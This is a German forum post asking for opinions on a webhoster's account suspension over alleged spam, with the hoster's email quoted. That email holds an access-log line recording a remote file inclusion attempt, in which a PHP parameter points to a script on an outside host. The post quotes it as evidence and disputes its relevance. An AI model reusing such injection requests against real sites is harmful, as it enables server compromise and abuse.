powie.de Tech Forum

Ich möchte gern einmal eure Meinung hören zu dem folgenden Vorfall. Einer unserer Anwender hat eine Account Sperre seines Webspace hinnehmen müssen weil angeblich tausende Spam Mails verschickt wurden. Dazu gab es diese EMail des Webhosters, die ich beim ersten Lesen für vollkommenen Sinnlos halte:
 

In den access_log Ihres Accounts wurden folgende Einträge gefunden:
- - [05/Jul/2010:00:07:52 +0200] \"GET /forum_d/edituser.php?boardid=http://amyru.h18.ru/images/cs.txt?
HTTP/1.1\" 200 24187 \"-\" \"Wget/1.1 (compatible; i486; Linux; RedHat7.3)\"
 
Folgende Skripte/Ordner wurden von uns per Chmod 000 gesperrt:
/tmp/.ICE
Bitte schalten Sie diese Skripte nicht einfach wieder frei, sondern prüfen mit
den Entwicklern, wie es zu diesen Sicherheitslücken innerhalb des Skriptes
kommen konnte. Ggf. verwenden Sie hier auch veralte Versionen mit bekannten
Sicherheitslücken.
[/quote]
Dazu habe ich zwei Argumente:
1. Ein solcher Angriff auf die edituser.php führt zu nichts, da dort die boardid  sowieso nicht verabreitet wird.
2. Die Datei /tmp/.ICE hat mit dem Webuser garnichts zu tun, die gehört im Original zum X System.....
3. Vergleichbare Anfragen finden sich in allen access_logs, auch in meinen eigenen, das sind Bots die das Internet scannen und versuchen Einbruchsstellen ausfindig zu machen.

Ich habe mittlerweile das access_log aus dem Zeitraum im Zugriff. Die genannte Zeile aus dem access_log kommt genau einmal vor.....  (!)

Gemerkt hab ich davon noch nichts, also bei mir wierden keine Mails versendet, das einzige was ich habe ist, das ich persönlich zig Spammails bekomme.

Spam bekämpft man mit Googlemail  /uploads/emoticons/icon_e_biggrin.gif.1a84f5257b36e14b36d04985314f877f.gif\" alt=\":-D\" />

Nö, den gebe ich nichts in die Hand...
/uploads/emoticons/icon_e_wink.gif.fcb053ab2c91cb6224c03a16c6332abf.gif\" alt=\";)\" />